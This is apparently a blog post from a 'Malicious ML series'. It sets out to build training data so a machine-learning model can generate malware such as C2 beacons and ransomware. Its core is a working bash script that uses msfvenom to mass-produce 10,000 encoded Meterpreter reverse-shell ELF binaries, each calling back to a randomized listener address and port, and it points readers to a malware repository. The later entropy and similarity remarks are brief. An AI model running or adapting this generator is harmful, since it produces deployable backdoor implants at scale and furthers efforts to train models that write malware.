Malicious ML series - generate ELF training data

I hold a PhD in Computer Science and have been published in a variety of international peer-reviewed journals.
AI is going to be a problem. I don't know what will cause the first "big issue": it might come from a courtroom where a defendant is sent to jail based on erroneous AI-generated data, or it could be a death in a medical setting. But something is going to happen.
Let's take the existing adversarial AI research (there's been plenty) and make it useful.
I'm here to bring you up to speed.
Purpose
If we want to train an ML algorithm to produce something malicious (say, a C2 beacon or a ransomware binary), we need good training data.
Approach
Use msfvenom to generate several thousand samples (10,000 in the script below) that we can then feed into an ML algorithm.
Drawbacks
Because a model trained on raw binaries bypasses the compile and link steps, at best it will generate working binaries for a single architecture. Even if it generates a valid binary, it's not going to produce magical AV/EDR-evading binaries that are compatible with multiple platforms and support customizable C2 domains. However, it's still a fun experiment.
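As a rough illustration of what "valid" means at the very lowest level, the sketch below only checks whether a file starts with the four-byte ELF magic number (0x7f followed by "ELF"). The function name is_elf is made up for this example, and passing the check says nothing about whether the file would actually load or run.

```shell
#!/bin/bash
# is_elf FILE: succeed if FILE begins with the ELF magic bytes 7f 45 4c 46.
# (Hypothetical helper for illustration; it does not validate headers or sections.)
is_elf() {
    local magic
    # Dump the first four bytes as hex and strip the whitespace od adds.
    magic=$(head -c 4 "$1" | od -An -v -tx1 | tr -d ' \n')
    [ "$magic" = "7f454c46" ]
}
```

A call such as is_elf out/sample.elf && echo "looks like ELF" would be a first filter before any heavier checks.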
Alternatives to generation
There are lots of malicious binary examples out there.
VX-Underground
Download binaries directly from [[VX-Underground]] or a standard academic dataset. This introduces a lot of variety in PE/ELF format.
Code
Prereq - msfvenom and uuidgen installed
#!/bin/bash
# Generate randomized Meterpreter ELF samples with msfvenom and log their labels.
overall_start_time=$(date +%s)
numFiles=10000
# Candidate values, defined once outside the loop.
LPORTCHOICES=(80 443 1025 8080 8888 4444 1234 12345 5555 3333 4433 8443 9999 10000)
# meterpreter_reverse_tcp and meterpreter_reverse_https are listed twice, so they are picked more often.
PAYLOADTYPES=("linux/x86/meterpreter/reverse_tcp" "linux/x86/meterpreter_reverse_tcp" "linux/x86/meterpreter/reverse_tcp_uuid" "linux/x86/meterpreter_reverse_https" "linux/x86/meterpreter_reverse_tcp" "linux/x86/meterpreter_reverse_http" "linux/x86/meterpreter_reverse_https")
ENCODERS=("x86/shikata_ga_nai" "x86/xor_dynamic" "generic/none")
# Make sure the output directory exists before writing to it.
mkdir -p out
echo "Generating files.."
for i in $(seq 1 "$numFiles"); do
    # Random host octet (1-100), port, payload and encoder for this sample
    LHOSTO=$((1 + RANDOM % 100))
    LPORTIDX=$((RANDOM % ${#LPORTCHOICES[@]}))
    LPORTR=${LPORTCHOICES[$LPORTIDX]}
    FILENAME=$(uuidgen).elf
    PAYLOADIDX=$((RANDOM % ${#PAYLOADTYPES[@]}))
    PAYLOAD=${PAYLOADTYPES[$PAYLOADIDX]}
    ENCODERIDX=$((RANDOM % ${#ENCODERS[@]}))
    ENCODERR=${ENCODERS[$ENCODERIDX]}
    # Generate based on payload type
    start_time=$(date +%s)
    msfvenom -p "$PAYLOAD" LHOST="192.168.0.$LHOSTO" LPORT="$LPORTR" -e "$ENCODERR" -f elf -o "out/$FILENAME" 2> /dev/null
    end_time=$(date +%s)
    duration=$((end_time - start_time))
    # echo "Generated $FILENAME : $PAYLOAD : 192.168.0.$LHOSTO : $LPORTR in $duration seconds"
    # Only label samples that were actually written (non-empty output file)
    if [ -s "out/$FILENAME" ]; then
        printf '%s\t%s\t%s\t%s\t%s\n' "$FILENAME" "$PAYLOAD" "192.168.0.$LHOSTO" "$LPORTR" "$ENCODERR" >> labels.tsv
    fi
    # 50-character progress bar: one '#' per 2 percent
    percent=$((i * 100 / numFiles))
    bar=$(printf '%*s' "$((percent / 2))" '' | tr ' ' '#')
    printf '\rProgress: [%-50s] %d%%' "$bar" "$percent"
done
echo
overall_end_time=$(date +%s)
duration=$((overall_end_time - overall_start_time))
echo "Done in $duration seconds."
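Once the script has finished, it can be worth checking how evenly the random choices were spread across the dataset. The sketch below counts the values in one column of labels.tsv; the column order (filename, payload, host, port, encoder) comes from the script above, while the helper name label_counts is invented for this example.

```shell
#!/bin/bash
# label_counts FILE COLUMN: count how often each value appears in the given
# tab-separated column, most frequent first. (Hypothetical helper.)
label_counts() {
    cut -f "$2" "$1" | sort | uniq -c | sort -rn
}
```

For instance, label_counts labels.tsv 2 would summarize payload types and label_counts labels.tsv 5 the encoders.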
Explanation
The script generates a batch of meterpreter shells for use in ML algos, randomizing the LHOST, LPORT, payload type and encoder for each one and recording those choices in labels.tsv.
Since the differences between these files will mostly be the encoded (or encrypted) payload, which is high-entropy, it's doubtful any ML algorithm can learn enough to generate working binaries, much less working malware.
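To put a number on "high-entropy", one option is to compute the Shannon entropy of each file's bytes, where 0 means every byte is identical and 8 bits per byte means the bytes look uniformly random. The following is a minimal sketch using od and awk; the function name byte_entropy is made up here, and it measures the whole file rather than just the payload region.

```shell
#!/bin/bash
# byte_entropy FILE: print the Shannon entropy of FILE's bytes in bits per byte (0 to 8).
# (Hypothetical helper for illustration.)
byte_entropy() {
    # od prints every byte as an unsigned decimal; awk tallies them.
    od -An -v -tu1 "$1" | awk '
        { for (i = 1; i <= NF; i++) { count[$i]++; total++ } }
        END {
            if (total == 0) { print "0.0000"; exit }
            h = 0
            for (b in count) {
                p = count[b] / total
                h -= p * log(p) / log(2)   # log base 2 via natural log
            }
            printf "%.4f\n", h
        }'
}
```

Running byte_entropy on each file in out/ and comparing encoded samples against the generic/none ones would show how much of each file the encoder actually randomizes.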
Entropy Analysis

We ran a simple cosine similarity comparison across the generated binaries. As the animation shows, the differences between binaries are distributed fairly randomly; note, however, that the scale of those differences is not extreme.
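The exact features behind that comparison are not spelled out here, so the sketch below makes an assumption: it treats each file as a 256-bin byte-frequency histogram and computes the cosine similarity between two such histograms. The function name byte_cosine is invented for this example, and a different feature choice (raw byte positions, n-grams) would give different numbers.

```shell
#!/bin/bash
# byte_cosine FILE_A FILE_B: cosine similarity of the two files' byte histograms.
# 1.0000 means identical byte distributions, 0.0000 means no byte values in common.
# (Hypothetical helper; byte histograms are an assumed feature choice.)
byte_cosine() {
    {
        # Tag each line of od output so awk can tell the two files apart.
        od -An -v -tu1 "$1" | sed 's/^/A /'
        od -An -v -tu1 "$2" | sed 's/^/B /'
    } | awk '
        $1 == "A" { for (i = 2; i <= NF; i++) a[$i]++ }
        $1 == "B" { for (i = 2; i <= NF; i++) b[$i]++ }
        END {
            for (v = 0; v < 256; v++) {
                dot += a[v] * b[v]
                na  += a[v] * a[v]
                nb  += b[v] * b[v]
            }
            if (na == 0 || nb == 0) { print "0.0000"; exit }
            printf "%.4f\n", dot / sqrt(na * nb)
        }'
}
```

Because every sample shares the same ELF scaffolding, histogram-based similarity between two generated files will tend to be high, which is consistent with the modest scale of differences noted above.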
Still, it's a fun experiment.